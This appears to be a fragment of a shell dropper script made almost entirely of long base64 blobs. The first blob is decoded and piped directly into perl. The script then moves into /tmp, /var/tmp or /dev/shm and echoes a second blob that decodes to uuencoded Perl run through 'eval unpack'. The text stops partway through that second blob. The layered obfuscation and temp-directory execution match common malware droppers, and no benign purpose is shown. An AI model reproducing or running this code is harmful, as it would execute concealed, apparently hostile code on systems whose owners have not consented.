GNVQ9NylOKiNgSS5QSEAoJ1QqXyJCYEA7N0RAKSYxQzhWJVI6UmBdKCIxQTxHJVU6NzlPLlBIQCgiMUQ4Vi1BPEZMQC83WEA8Ul07K0JJPCtVVEg3JSxLKjJcRCwyXFsiQEhAKCZVWV8oIjFNOTc1STwiYF0oIjBaLkZFUjhVXVM5NylWOTcpUz5SKEQuQ0kpNEQtPzhXNVI3Vy1POFZNRT0iKV0+Uj1NOTc1STwiPV0uUEhAKCZVWSgiMUxfO1ZZRzo3YEAvMiFVO0chQThWTEgoRFhCKyZFTjk3MT84NzFPO0JARDs2NVU6N2BJKjNMKiJCYEA7N0RAMCY5STsmNVM9JiVUKCNUQDxXMUE9IkBEXzg3KVE9NkVWO1JEWyJCYEA7N0RAKSctST5GNT89Jl1UODZQXSkmOUk7JjVTPSYlVDZTPT0uUEhAKCZFRigiQEQ8VkVaOTVdVDtXMUE7ImBdLzJgUF8qMiFbIkJgQCgiYEA8RjVUPTcpTiojYEkuUEhAKCdUKiJCYEA7N0RAKiIxUDtXKVQ4MlBAKSctRTtGMVM7Vi1LKjNMKigiIUQ7UiFbIkJgQCgiYERfPCZdUj0mJEAvMiFJO0cwQDxGJU45IkBWLSM0USwyRFsiQmBAKCJgRDwmXVI9JiRAKlNUQCwzYFItI0wqKCJgQCgiMVM5NllEPFZdQzpSYF0oJEUvXy5DSTM7Vi1LOTcwWi5ERS4xNTBNL0ZZRT1SQSw6Ny1UOTZYXS9DJEwoJFFPOFYlTDQmXVI9ImBdL0IxUDtXKVQ4MlBANCcpTz0mXEAvM1hAKVcxQ188IjxJKCYlTjkiYEQ5Ji1DN1ctRTsiVF44NjFEKiIxUzk2WUQ8Vl1DOlJEWyJCYEA/MiFVO0cxSTsiYEQ8VjVOOSctTzhWTFsiQEhAKCIxJDBULVtfKSctRTtGMVM7Vi1LPzdNVDo3IU8/MmBdKCI9Uzk2WUQpU0wqKCJgRDEkLSM+UjFTOTZZRDxWXUM6V1VbO0ZFQzpXVEAvMmBEO0ZFQzpTTCooImBEXzEkLSM+UjFTOTZZRDxWXUM6V1VbOEdFVDk3LV0oI1RAKSctST5GNT89Jl1UODZQWyJCYEApJDEjMFdMRDxWNU45Jy1POFZNXT5WJVI8NzVJPUZdXV8oI1RAKSYlUjw3NUk9RlxbIkBIKigiYEYuQ0lDPSYtUCoiKEQ7RkVDOlIoTCgiKSQwVCxANFQ1LjEiYEQ5Ji1DODcpSygiMUw7VllHOjdgQCknIU9fPEcxQSgiMVM6N0lFN1cxTz0mJUwoQkRbIkBJXSJASVM9NihAMVQ1NCgnTCooIiFNPjJgSCkmJVI8NzVJPUZcTCgiMUQ4Vi1MO1ZZRzo3YEwoIjFEXzhWLVA7VylUODJQQCkmKVk9JjVTKyJgRDtGRUM6UkRALzIhYDdTTCooIiFSOTcxVTxGWEgsIkRAOjY4QCoiVUUoIihEODcpUT02RVY7UihJLlBIQF8oJkVGKCJBTzwmNU4qJDkpMyQ0TCgiKF4oIjFBPEclVTo3OU8oQkRJKCdMKigiYEAoIiFDOyZdUzkyISYyNFElLlBIQCgnVEA5NlFTOTIhWyJCYEBfKCIhUjk3MVU8RlhILCJEWyJCYEA/MEgqKCIhTT4yYEQ5Ji1DOjdgXTlGRVg4NjFEPEJARDkmLUM7Jl1OOVZFUCozTCooIiFSOTcxVTxGWEgsIkRAXzo2OEAqIjFEOFYtUDtXKVQ4MmBcKCMkUCxDMEA7VyhAO0ZdVCgmMUU5RkVOOTYwQCkmMUM4VkVQKCZdUigiMUI+NzFFPFJgXCgjJEkuUEhAKCZVWV8oIjFEOFYtUztWLUsoI1RAMjRcWi5FLU84Vk1FPSNIWjI0WSU1IlReO0Y1VyolIVI7VzFPLzNYQj0mLVAoQlBANCY1RTxEJUQ5JyhdL0IxRDhWLUlfPCJQQDQmNUU8RSFPPEcwXS9CMUQ4Vi1QO1cpVDgyUEA1JkVNOTZdVT0jVF4sMzRJKCZdUignKUU9JzVSO0JgSCwiRFsiQmBAKSYxQzhXLU84VkxNXy9GJVU9Jl1GOyc1UzoiQFEqM0wqKCJgRDkmLUM3Vy1FOyJUXjg2MUQqIjFEOFYtUztWLUsqM0wqKCJgRDEkLSM+UjFEOFYtUztWLUs/N01UOjchT18/MmBdKCI9Rzk3MEcuUEhAKCIxJDBULVspJjFDOFctTzhWTV0+VkVUOjZVRT8yYF0oJzFJOzY0WyJCYEApJDEjMFdMRDkmLUM8Vl1DOldVWztGRUNfOldUQC8yYEQ7RkVDOlNMKigiYEQxJC0jPlIxRDhWLVM7Vi1LPzdNQj43MUU8V1RALzJgRDhHRVQ5NyxbIkJgQCkkMSMwV0xEOSYtQzxWXUM6V1VbXzhXNVI4R0VUOTdUQC8yYFAuUEhAKCIxJDBULVspJjFDOFctTzhWTV0+ViVSPDc1ST1GXV0oI1RAKSYlUjw3NUk9RlxbIkJgQCkkMSMwV0xEOSYtQ188Vl1DOldVWzo3IV0oI1RAKSYxQzhWRVAuUEhAKCIxJDBULVspJjFDOFctTzhWTV0+VyFPPEcxQT8yYF0oIjFEOFYtUDtXKVQ4M0wqKCJgRDEkLSNfPlIxRDhWLVM7Vi1LPzdNUz0mJVQ9Ny1dKCNUQChFKUU4VjVCOTZZRDtSKFsiR1QqIkctVThCITM9JiVUPTcsQD5QSEAoJlVZKCIxUztWLUs5NzBAXy8yIVM6JkVGPSNMKigiIU0+MmBEPFZdQzpVXVQ6NyFPKCNUQCkkMSMwV0xEPFZdQzpWNVQ/N01UOjchTz8zTCooIiFVO0ZRRTxXLEAqJlFDKiIxU187Vi1LN1cxSTwmXEkoJjVRKCIpQzomJVQoQkRAPlBIQCgiYEA7N0RAKSZZSThWTEAvMmBEMSQtIz5SMVM7Vi1LOTcxXT5WWUk4Vk1dLlBIQCgiYEBfOzdEQCkmJVI8NzVJPUZcQC8yYEQxJC0jPlIxUztWLUs5NzFdPlYlUjw3NUk9Rl1dLlBIQCgiYEA7N0RAKSZFVDo2VUUoI1RAKSQxIzBXTEQ8Vl1DXzpWNVQ/N01JPSZFTTk3VFsiQmBAKCIhTT4yYEQ5RzFJOzY0QC8yIVQ6NlVFLlBIQCgiYEA7N0RAKSctVDg3MVU8UmBdKCIxJDBULVspJy1POFZNRV89J1VbPFcxQT0nNVM/M0wqKCJgQCgiMUY9JkVNOTJgXSgiMSQwVC1bKSctTzhWTUU9J1VbOUcxSTs2NV0oJkVGKCYxRTlGRU45NjBIKSQxIzBXTERfPFZdQzpWNVQ/N01GPSZFTTk3VEkuUEgqKCJgQCgmVVkoIjFEN1cxSTs2NEAvMmBEOUcxSTs2NE0pJkVUOjZVRS5QSCooImBAKCZVWSgiMUM9Nyk/XzhHRVQ5MmBdKCIxJDBULVspJy1POFZNRT0nVVs4VzVSOEdFVDk3VFsiQmBAKCIhTT4yYEQ4R0VUOTctPz0mXVQ4NlBALzJgQCkkMSMwV0xEPFZdQ186VjVUPzdNQj43MUU8V1RbIkBIQCgiYEA7N0RAKScpQT0mNEAvMmBQLlBIQCgiYEApJylBPSY0QC8yYEgpJi1VPEVdQj43MUUrUyRQLEMwSStSMURfN1cxSTs2NEA6NjhAKSYtVTxFXUI+NzFFKCNYQCwjTCooImBAKCZVWSgiMVA7VylDOTZYQC8yYEgpJi1VPEVdQj43MUUqQyRQLCJETykmKVk9JjVTXzdXMU89JiVMLlBIKigiYEAoJlVZKCJARDxFXUQ9NzhMKCIxUDdWMVU9QkRbIkJgQCgiIUk5QmBIKScpQT0mNEAvN1hAK1VYSDcmMEsqNVBOKiVRRF8qMkE8OSJESDcmMEkrUkRAPlBIQCgiYEAoImBAKScpPzknNVYoI1RAKSMsWygiMVI3VjFVPUJMSygmRUYoIjBUKCNYXSgjNFsiQmBAKCJgQCgiYERfPEYlVDkyYF0oIihELDVQTikjKEIrQihEPEVdRD03OEIuUEhAKCJgQD8wSEAoImBAOjY4QCoiMVA7VylDOTZYQC83WEArVVhINyYwSyo1UE4qJVFEXyoyQTw5IkRINyYwSStSREA+UEhAKCJgQCgiYEApJyE/OSc1VigjVEApIyxbKCIxUDdWMVU9QkxLKCZFRigiMFQoI1hdKCM0WyJCYEAoImBAKCJgRF88Jl1SOFY1TigjVEAoQjBRNyJYRCxCKE4oQjFQN1YxVT1CKFsiQmBAKCIhXSJCYEAoIiFSOTcxVTxGWEgoQjFTO1YtSzdXMUk8JlxCKyIoRDxXMUFfPSc1UyhCUEIpJllJOFZMQisiKEQ4NylRPTZFVjtSKEwoQjFCPjcxRTxVXVQ7VzFBOyIoTCgiKEQ4VzVSN1YpWT0mNEIrIihEOSVdVDo2VUUoQlBAXyhCMVI4NzFFKEJQQChCMVA7VylDOTZYQiozTCooIiFdIkBIKigiIVI5NzFVPEZYSCwiRFsiR1QqIkBJUz02KEA5RkVYODYxRDxCIVsiQmBAKCIhTV8+MmBIKSYlRDknKUU8VyxJKCNUQDAlXFsiQEhAKCJgQDhWQU87N2BAKSYlRDknKUU8VyxbKCJgQCgiYCooImBAKCZFRigiQEQ4NjFEPEY1UzxSYF1fP0JgTzdFUUQqUjBPKjIhWyJCYEAoImBAKCJgQDxGNVQ9NylOKCZFTjk3MT87RzFPODJBUDg2LUsoIikuKEJQQCkmJUQ5JylFPFcsSS5QSEAoImBAXz8yIUU7Jy1JOUJgSCkmJUQ5JylFPFcsQC83WEArVVk7LDMpPS9VUUQ+UyRMLEdVPCtFTFEsRVRfNyYxWywyUFI/NVBONlMkUjczXTw5J0xRKyMpXV83Ilk7LDMpPS9VUUQ+UyRMLEdURCtSREA+UEhAKCJgQCgiYEAoJylFPSc1UjtCYEQ4NjFEPEY1UzxTTCooImBAKCdUQDk2UVM6NjhAKiIxQTkmMVJfOTctUygjVV4oJzFSK1YkTT5EJE02QlxPKjIhWygiYEAoImBAKCJgQCgiYEAoImBAKCJgQCgiYCooImBAKCJgQCgiIVI5NzFVPEZYQDo2WUU9JV1OXz0mXUEqIkBIOVY1VDomXVM9JilZO0YlTTkyQEQ4NjFEPEY1UzxSREk2UzE9KjVMUDcyRFsiQmBAKCIhXSgmNUw8VjRAPlBIQCgiYEAoImBAKCcpRS09JzVSO0NMKigiYEAoJ1QqPzB9Cg==" | base64 --decode | perl
cd /tmp || /var/tmp || /dev/shm
echo "ZXZhbCB1bnBhY2sgdT0+cXtfIkZVWSgiMVA8Rl1DOTctUztSYF0oIj1SPFdFTjhSPFsiQEhEPFY1Uj1GRUQ7VyhdKVMkVC1CWFEuIzROLDM8UStDKFItUjxAPTZZTDk3LVMoIjFTXzk3KVY6NjFPPENMKjs3REApJyFPPEcxQS8yPFQtIyxHLlBJTT4yIWA4ViVOODZFUy8yQEIoVyFQKEJEWyJGVVkoJCFBOSZVUy8yQEIwMihMKEVAQl8qM0wqOzdEQDAmJVU9JkBdKiIpTDtWLUE7JkFPPFcwQiozTCoiRlVZKCIxTDo2WUE8VV1NODdAXS1DTCo7N0RAKSctTDk2NVAvMyxbIkBJTT4yYERfO0ZFQzpSYF0oJj1FPSZZSThWTEgqM0wqOzdEQCkmRVI4VllBOzY0QC8yIUc5NzFOOjYtSyoiRFsiRlVZKCIxUjk2JUw7RiVNOTJgXSgiQUA9NllBXzs2NEArNiVAKjNMKiJGVVkoIjFBOFY1UzxWXVM6JjVMOyJgXSgjJFsiRlVZKCIxUDxGNUY6N0FPKCNUQChCJEAoQ0wqOzdEQCkmNVM9JiVUOjctVF86Ni1BPFJgXSgjYFsiRlVZKCIxUDg2LU89JjVTKCNUQCwzTCoiRlVZKCIxNjE1KTMwNFxALzJgRywiWFI4MjxbIkBIRDRURSc+Uj0pM0UwRz8yYF1fKCI9KTFUWS80RDRHLlBIRDRURSc+Uj0oNTVgRz8yYF0oIj0pMVRZLzRENEcuUEhENFRFJz5SPTQxNSktKVdUQC8yYEcyND0uM1UpJSlTTCopJS0pXzFXTEcwVEEsMSI9XSgjVEApVEUnM0RdMjEyPFsiQjEzMjQ9WylVITMpV1RALzJgRzI0PS4zVSklKVNMKiJHNVM5MiEpM1NIWjRWXUM6VjVULlBJVV88VjRANFZdQzpWNVQuUElVPFY0QDI0XFouRS1FOyY1Qz0jTCo4VkFEOjcoSChCXEIqM0wqKSctRTxHOUk5Jl1SLzIoRDA1KSc1RUxQNzIoQDo2OEBfKSQlMjFVOTssJVRbIkIwUC8yKEQ8JylPOFY1UzxWXEIrQik8LCIoWyJGVVkoIjFQOjYwXTlGXVI6U0wqOTdBST0iIUk5QmBEPCZFRC5QSUQ6NjRAXyhFIVI7VilMOTZVQSgmLU87MiFPKCY5TzxGTFooIjBBKEIhVTtGUUU8VyxAOSY1Rjo2WUU5IkBEPCZFRCozTCoiRlVZKCI1STxGLT88VjVSPUY1Ul88U0wqOzdEQCk0MSMwU0wqOzdEQCkmMUM4VV1TOTZQQC8yIU45NzxAMjRcWi5FLUU7JjVDPSJUXjtGNVcqIkRbIkBIKiJASVM9NihAOVY1VDtGRUNfOlIhWyJCYEA8RjVUPTcpTigiKVgoQllJO0cwSDxGJU45IkBZLjNEWSoyRE4oQlRCK0ZFTj0iQVI4NllEKiNEWS4zREkqM0wqPzBIKiJHLVU4QiFHXzk3MUk5JjVOPSIhWyJCYEA7N0RAKScpRT0mXVI7Rl1JOSY1Tj0iYF0oIjk/OVY1VCoiKUg9JzFQLkJcTz1XPVcrRlVJO0chTzwiWUM7VlRPPFZMUV8sRyFBOFZMTzo2MUU7RzFTK0chSDwiKEkuUEhAKCZVWSgiMUk5JjVOPSYtSDg2WUM5MmBdKCZFTj0iQVI4NllEKiMkUCwjYEkqM0wqKCIhSTlCYEhfKSZFRDk2WVQ4VkFBO0YtRSgjWEAsU2BJKCdMKigiYEAoIiFSOTcxVTxGWEApJllJOFZMWyJCYEA/MiFFOyctRSgnTCooImBAKCIhUjk3MVU8RlhAXyknKUU9Jl1SO0ZdSTkmNU49I0wqKCIhXSJCYEA8RjVUPTcpTigiMVI5NzFPPEZZTzo2MUU7RzBbIkdUKiJHLVU4QiFHOTcxTjg2VUUoJ0wqKCIhTV8+MmBEPEY1VDtXKU47VllBOzY0QC8yYEY3Vj1FPSJAQjonMVQ8I0hPK1c9Vz1SWU06NllQO1dgTjhWXU0rVy1LLDMpUDg2LUsrVllBOzY1UytHIUhfPCIoSS5QSEAoJylFPSc1UjtCYEQ8RjVUO1cpTjtWWUE7NjRbIkdUKiJHLVU4QiFHOTcxSTkmNU49IyhAPlBIQCgiYEAoImBAKCZVWSgiMUw5NllHXz0mQF08VkFJOUcwWyJCYEAoImBAKCJgQCkmUUU7Rj1UOiJgXSgjLEA6NjhAKiIxTDk2WUc9JkBALyJgUyozTCoiQmBAKCJgQCgiYEA7N0RAMCYtSF84NylTLzJARzgyPE4rQj1aKVJQRzAyPE4rQj06KVJQRywyPE4rQjxZKVJEWyJCYEAoImBAKCJgQDlGXVI5NiVDOiJgSCwyWE4pJlFFO0Y9VDoiRCpfKCJgQCgiYEAoIiFbIkJgQCgiYEAoImBAKCJgQCgiYEAoImBEPEYlTjkmXU08VzFSOjZZRytDVEQ4VkFBPEctOzxGJU45IiFgOFZBQTxHLT0uUEhAXygiYEAoImBAKCdUKigiYEAoImBAKCIhUjk3MVU8RlhAKScpQTtGMU87Ny1UPEZFTjlTTCo/MEgqPFc1QigmPUU9Jy1UO1cpRSgiQEQpIkQqPlBIQF8oJlVZKCIxVTxGUEAvMiFTOiZFRj0jTCooIiFNPjJgRDlGRUw5MmBdKCctSDo2OVQuUEgqKCJgRDonMVQ8JV1TPScpRTg2VT87VzVUKCNUQCwzTCpfKCIhTzwmNU4qJD0lNSVdLzU1MSYyNFElKyJgQi9CYEQ5RkVMOTIoSS5QSEAoIjVIPScxUDdWUU87VyE/OFZBRThWTEAvMmBIKjNMKigiIT85VjVUXyoiMVU8RlBJLlBIQCgmLUw7Vy1FKCQ9JTUlXS81NTEmMjRRJS5QSEAoJylFPSc1UjtCYEQ7NiVJO0NIWjonMVQ8JV1HOTcxPzxGNVM9NlFULlBJXV8iQElTPTYoQDdWPUU9YElbIkJgQDs3REApJzVSOyJgXSgnLUg6NjlULlBIQCgmVVkoIjFQPEZdWD4yYF0oIihCLlBIQCgmPVI5N2BAPlJBTDhSQERfN1JEQDk3JEAoRkFUPSchPzwnKU8+J0RCKjJgRilCYEgpJyFSO1dBWSgjVEApJDUuNUdMRDdXVEk/MiFLOTdFUygiNSUzRThbIkJgQDo2OEAqIkBEXzwnKU8+J0RAOTckQChCKEkoIjhGKCIxVTxGUEAvN1hAOzJRPjonMVQ8I0hPK1JBOzdCXFo3MkxJKiNcWi5CQTw5IkxJKjNcSCtVUTMqQkRfKSJQSV8oJ0wqKCJgQCgmVVkoIjFIO1ctVCgjVEApIyRbIkJgQCgiIU0+MmBEPCZdUj0iYF0oIjBSKCdRXCgjQFAuUEhAKCJgQDs3REApJyFBPSZAQC8yYERfLFNMKigiYEAoIjFQODcxSCgjVEAoQlxCKCc1TjsmNVM8UiFEOTY5STtGNUQqIjFQODcxSCozTCooImBAKCcpRT0nNVI7QiE/PScpST1GRUE7JV1IXz0nMVA3Vj1FPSJARDomXVM9IlBAKSchTzxHMEwoIjFQODcxSCozTCooIiFdKCY1TDxWRUYoIkBEPCcpTz4nREAvN1hAOzJRPjonMVQ8I0hPK1JBO183QlxaNzJMSS5CQTw5IkxJKiJdPDRSSEkvUjBMKjIhWyJCYEAoIiFNPjJgRDomXVM9ImBdKCIwUS5QSEAoImBAOzdEQCknIU88RzBALzJgRCxDTCpfKCJgQCgmVVkoIjFQODcxSCgjVEApJzVSOyNMKigiYEAoJylFPSc1UjtCIT89JylJPUZFQTslXUg9JzFQN1Y9RT0iQEQ6Jl1TPSJQQCknIU88RzBMXygiMVA4NzFIKjNMKigiIV0oJjVMPFY0QD5QSEAoImBAPEY1VD03KU4oJzVOOSY1Ri5QSEAoJ1QqPzBIKiJHLVU4QiE/PScpST1GRUE7JV1IPScxUF83Vj1FPWBJWyJCYEA7N0RIKSZBTzxXMEwoIjFQO1cpVCsiYEQ8JiVUOiJEQC8yIWA3U0wqKCIhTT4yQEQwND0lM0UwTCgiMTYxNSkzMjRdLisiYERfPCJEWyJASEAoIjEhMVQ1LjUiYF0oIilHOTcwTTs2RU46NlVBOyIoWyJCYEApJTklNEUtKTNUWEAvMmBCLENgUCwjYFEsM0BCLlBIKigiYEQ8JiVUXzoiYF0/QiFTK1JgTykzKFArVjxbIkBIQCgnKUU8NzVJPEY0QDI0XFouRS1POFZNRT0jTCooIiFMO1YtQTsiQEQ3RTxJKCNUQCwjTCooIiFNPjJgRF88Vl1DOlJgXSgkRS8uQ0kzO1YtSzk3MFouREUuMTUwTS9GWUU9UkEwOTY1UjA2MUQ8QmBdL0JgRDomXVM9IlAqKCJgQCgiYEAoImBAKCJgQCgiYEBfKCJgQCgiYEAoImBAKCJgQCgiYEAoImBAKCIhMDk2NVI0Jl1SPSJgXS9CYEQ8Jl1SPSJQKigiYEAoImBAKCJgQCgiYEAoImBAKCJgQCgiYEAoImBAXygiYEAoImBAKCJgQCgiITA8Rl1UO1JgQCgjVF4oIj1UOFdgRytgSEAoImBAKCJgQCgiYEAoImBAKCJgQCgiYEAoImBAKCJgQCgiYEAoImBAKCJgQF8oJTFJOzY1Tz03MEAoI1ReKCM4UCoyIVw/IiFSOTcxVTxGWFsiQmBAKSctTzhWTE0vRiVVPSZdRjsnNVM6I0wqKCIhTT4yYEQ7RjVUOyZdQygjVEBfKSZBTzxXMFsiQmBAKSZZRT0mUU84UmBOLzJgQi5CMVA7VylUKEIhSTlCYEQ8Jl1SPSJgQS8yYFgsI0wqKCIhTT4yYEQ8RjVRPTY1Uz0iYF0oIiknXzE1MEApJyFBPSZAQDIlMTQ0IlxRK0MhPCwjJFU3I2BRLEIoKigiYEAoImBAKCJgQCgiYEAoImBOKCIpKDtXLVQuQmBEO0Y1VDsmXUM3I2BRLTVQUF8sMyhCIkJgQCgiYEAoImBAKCJgQCgiYEArQmBCNTctRTxCVSE5VjVOPSNIQCkkJScxNFk0K1IxNjE1KTMyNF0uK1c1PCwjJFU3I2BRLEIoWyJCYEBfKScpRTw3NUU8VzBAK0NUQChFIVI4Nj1NODNIQDtGXE04ViVDOiY1PCwjJFU3I2BRLEIoQDo2OEAqIjFNODZFTi5DSUg9JzFQN1ZZTzdWLUE4VkFFXyozTCooImBEPEY1UT02NVM9ImBOLzJgQjcjYFEtNVBQLDMoQi5QSEAoJyFSOjZZVCgiMVM7Vi1LKCIxUjk3JVU5Ny1ULlBIKigiIU0+MmBEOEc1Rl8oI1RAKEIoWyJCYEA7N0RAKSZYWyJCYEA7N0RAKSYoUSgjVEAoQihbIkJgQD1WQUk7JjRAKiIxTigjVEA8V0VTPEY1QTkiQEQ8Vl1DOlJQQCkmKVVfOUJQQC4iSFEsIyhUKyIhTDk2WUc9JkBIKSYpVTlCREkqMiFbIkJgQCgiIUk5QmBIKSYoUSgmNVEoIihCKjIhWyhgSEAoImBAKCJgRDhDJEAvMmBEXzhHNUYuUmBAKCJgQCgiYEAoYEhAKCJgQCgiYEQ4RzVGKCNVXignLE8rQkxfNyNgUS0zXTwsIyRSNyNgUS0zXTwsIyRSK1JdUy5SYEAoImBAKGBIQF8oImBAPzBIQCgiYEA6NjhAKiIxSD0nMVA3Vy1UPEY1QTs1XU89NzBJKCdMQDwnKUk7RzBAMVQ1NDdUXTU1JDkpMyQ0QCkmKVU5Q0xAKSYpVTlCYF1fKCIoQi5SIV0iQmBAPzBIQCgnKUU9JzVSO0IhVTtGMUU5QiFVO0ZRRTxXLEA5JjVGOjZZRTkiQEQ7QkRbIkBIQCgiMU04NkVOLkNJSD0nMVA3Vj1FXz0lXVI5Ny1VOycwQC8yYFIsI2BbIkJgQDo2OEAqIjFCLDJgXT9CIU0rJVkoNSUxMCtVUUQqVVBONyYwSzcnLEsqJVFEKlJFOzdFUFAsMyk9KkVQUF8sMyhMKjIhWyJCYEAoImBEOzYlSTtDSFo6JzFUPCVdRzk3MT88RjVTPTZRVCgjVEApIyRbIkJgQCgiIUk5QmBIKSZVQTo2WFouRkFUPSchPzlWNVRfN1cpRTxXNUw9ImBdP0JgTzdDLFA2UyRSLFM9PStSYEYpQmBEOEMkQC83WEArVVBQLDMpLDtWLUE9JkVPO0NJPDxSSEg3JSxLKjJcKioyIVsiQmBAXygiYEAoJlVZKCIxVTxGUEAvMmBELDNMKigiYEAoImBAPEY1VD03KU4oJzVOOSY1RigmRUYoIjFIPScxUDdWUU87VyE/OFZBRThWTVspJzVSOydUS18qU0wqKCJgQCgiYEA8RjVUPTcpTiglXUc5NzBIKSc1UjsiRFsiQmBAKCIhXSJCYEAoIiFSOTcxVTxGWEA9NllEOTY4QD02WUw5Ny1TKCIxTTg2RU5fLkNJSD0nMVA3Vj1FPSVdUjk3LVU7JzBALzdYQCtVWFIrU0wqKCIhXSJASEAoJylFPSc1UjtCYEQ4RzVGLlBJXSJASCopJy1FOyVdQzsmRUU7RzFFXygjVEAyNFxaLkUtRTsmNUM9IlReO0Y1VyoiRFsiRy1VOEIhUzk2WUQ8RiVXKCdMKigiIUk5QmBIKSItPygjVF0oIjxRKVJEQD5QSEAoImBAOzdEQF8pJy1POFZNRT0iYF0oIjE/NlMhPS5QSEAoImBAPCcpSTtHMEApJy1POFZNRT0iYEIpJV07LDVVPDtCKFsiQmBAPzIhRTsnLUUoJ0wqKCJgQCgiYEBfPCcpSTtHMEApJEUyMFVdQz03KT88Vl1DOlY1VCgiKEQ3VUxQNzVRTihDTCooIiFdIkdUKiJHLVU4QiFDO1ZZRThXMUE8QiFbIkJgQCgmVVkoIjFNXzk3NU46Ni1LKCNUQCklXTssJVRbIkJgQCgmVVkoIjFTOTcpVjo2MU88RV1DO1ZYQC8yYEQ3VUxRNzNMKigiYEA7N0RAKSchTzxHMUE3Vi1PO0JgXV8oIjE/NlMpPS5QSCooImBAOzdEQCkkRTIwVV1TO1YtSzk3MEAvMiEpM1NIWjRWXUM6VjVULkNJKTNENTQrM1lOOTc8SDQnKU89JlxdL0IpVDhXYEJfKyIhMDk2NVIwNjFEPENUXihCMVM5NylWOjYxTzxFXUM7VlhCKyIhMDk2NVI0Jl1SPSNUXiknIU88RzFBN1YtTztCREA7VyhAPEY1VD03KU4qIyRJXy5QSEAoIiFJOUJgSDkmNUY6NllFOSJARDI1KSM3Vy1POFZNRT0iREkoJ0wqKCJgQCgiYEQyNSkjN1YtVTxFXVM7Vi1LOTcwQC8yYEQyNSkjN1ctT184Vk1FPSNMKiJCYEAoImBAKSRFMjBVXVM7Vi1LOTcwTS9GJVU9Jl1GOyc1UzoiQFEqM0wqKCJgQCgiYEQ8VjVMN1YtTDo2NU49JjRNL0YlRDkiQERfMjUpIzdXLU84Vk1FPSJEWyJASEAoImBAKCIxSTxGLT88VjVSPUY1UjxXTEQyNSkjN1YtVTxFXVM7Vi1LOTcxXT5SPUg7Vy1UKVdUQC8yYEIpJy1FXzxHOUk5Jl1SN1YtTztCKFsiQmBAKCJgQCkmRVI4VV1TOTcpVjk3KVM+UjEpNEQtPzhXNVI3Vy1POFZNRT0nVVspVyFPPEcxQSlXVEAvMmBCKSchT188RzFBN1YtTztCKFsiQmBAKCJgQCkmRVI4VV1TOTcpVjk3KVM+UjEpNEQtPzhXNVI3Vy1POFZNRT0nVVspVllJOFZMRz8yYF0oIjFNOTc1Tjo2LUtfLlBIQCgiYEAoIjFJPEYtPzxWNVI9RjVSPFdMRDI1KSM3Vi1VPEVdUztWLUs5NzFdPlI9TTk3NUk8Ij1dKCNUQCkkRTIwVV1TO1YtSzk3ME0vRy1PXzhWTUg7Vy1ULlBIQCgiYEAoJllJOFZMSChCMU05NzVOOjYtSyhCRFsiQmBAKCJgQDxWNU45JylBPVJAQjU1LSU0QmBEOjcpQztGJU05MmBCK0IxKV80RC0/PFZdQzpWNVQrM1lTO1YtSzomXVM9IlhCKCIxUzk3KVY6NjFPPEVdQztWWEAuQjFSOTYlTDtGJU05MihJLlBIQCgiYEAoJy1MOTY1UCgjKFtfIkJgQCgnVCoiR1QqOzdEQCkmUUk7RjU/PSY1TTwjTCo9VkFJOyY0SCgjJEAqMiFbIkJgQCgnPUg6NlFFKCJAQSomTUU+NyxIKTZFUjhVXVM5NylWXzk3KVMqMkRJKCdMQDhWXU45Ni1UODcoSChCMU46Ni1LKEJQQChCMVM5NylWOjYxTzxCKEwoIihEPCZdUj0mJEIqM0xAPzBIQCgiIUQ5NlFFPSY0SF8pJkVSOFVdUzk3KVY5NylTPlI8Rz8yREA6NjhAKiYxRTlGRU45NjBIKSZFUjhVXVM5NylWOTcpUz5SPEc/MkRJLlBIQCgiYEYxJC0jLkNJQztWWU5fOTYtVDo2XU48U0wqKCJgQDs3REAwJylFODYxWSgjVEApJy1FOyVdQzsmRUU7RzFFKzNZQzg2WT88RjVBOSJAUCtDOEkuUEhAKCIhTjk3QVQoJzVOXzsmNVM8UkFgPEY1QTknREkuUEhAKCIhRjtXKUU4Ni1IKCIxRjoiYEgwJylFODYxWSoyIVsiQmBAKCJgQCkkRTIwVV1DPTcpPzxWXUM6VjVUKCNUQF8pJjlILlBIQCgiYEAoIjFNOTc1Tjo2LUsoI1RAKSZFUjhVXVM5NylWOTcpUz5SMSk0RC0/OFc1UjdXLU84Vk1FPSdVWylWWUk4VkxHPzNMKigiYEBfKCJgRDtHKUU4NjBALzIhUz43LVI5NiVEKiIxRjoiUEApJlVTOVJQQC0jYFktQkRbIkJgQCgiYEA6NjhAKiIxTjxGNUE5ImBdLzJgUCoyIVsiQmBAXygiYEAoImBAKSctRTslXUM7JkVFO0cxRSszWVI5NlVPPUY0SCkmOUgqM0wqKCJgQCgiYEAoImBEOUZATS9GLUw7Vy1FLlBIQCgiYEAoImBAKCYxRV87JjVUOTJARDo3KUM3Vy1FPEc5RTxHLVspJjlIPzJEWyJCYEAoImBAPzBIQCgiYEAoJCFMOjZZRTxSYF0oJy1QOyZFVCgiQE83JlhPKyJgRDs3LUdfKjNMKiJCYEAoImBAOUZdUiomVVkoIjFDLzNgWygiMUMvI1RAKSItTDo2WUU8U0xAKSYsSypSREA+UEhAKCJgQCgiYEApJlFJO0Y0QC8yYEQ7JkVOXzk3LTspJi09LlBIQCgiYEAoImBAKSZRSTtGNF0pJlFJO0Y1Pz0mNU08IlhEOyZFTjkyIUk5QmBIKSZRSTtGNT89JjVNPCJEWyJCYEAoImBAKCJgRF87JkVOOTVdVDk2VVAvMjxHLlBIQCgiYEAoImBAKSZRSTtGNEAvN1hAPFJdPDxCME8rU0wqKCJgQCgiYEAoJzVOOyY1UzxSYEgpJixALzNUQCkiLUxfOjZZRTxSREA+UEhAKCJgQCgiYEAoIiFQODcpUzkyQEIpJlFJO0Y0QiozTCooImBAKCJgQCgnVEA5NlFTOTIhWyJCYEAoImBAKCJgQCgiYEA6NjhAXyoiMEM7JkVOOTcsQC8zVEAsIkRAPlBIQCgiYEAoImBAKCJgQCgiYEA8JiVSPFY0SChCMUw6NllFKEJEWyJCYEAoImBAKCJgQCgiYEA/MiFFOyctSV85QmBIKSZRSTtGNVM2UjFDNzJgXT9CYE83JyhEK1JEQD5QSEAoImBAKCJgQCgiYEAoImBAKCIhUDg3KVM5MkBCKSZRSTtGNEIqM0wqKCJgQCgiYEBfKCJgQCgiIV0oJjVMPFZFRigiQEQ7JkVOOTJgXT9CYE83QkE8NFJMSSgkWS81JEUjMTIhITU1MSgoI0k8KkVQSjciSE8qMiFbIkJgQCgiYEAoImBAXygiYEAoImBAKCchQTxHLUUqIihEOyZFTjkyKEkuUEhAKCJgQCgiYEAoImBAKCdUQDk2UVM5MiFbIkJgQCgiYEAoImBAKCJgQCgiYEAoIjFMOjZZRV83VzFFOzdgQC8yYEQ7JkVOOTNMKigiYEAoI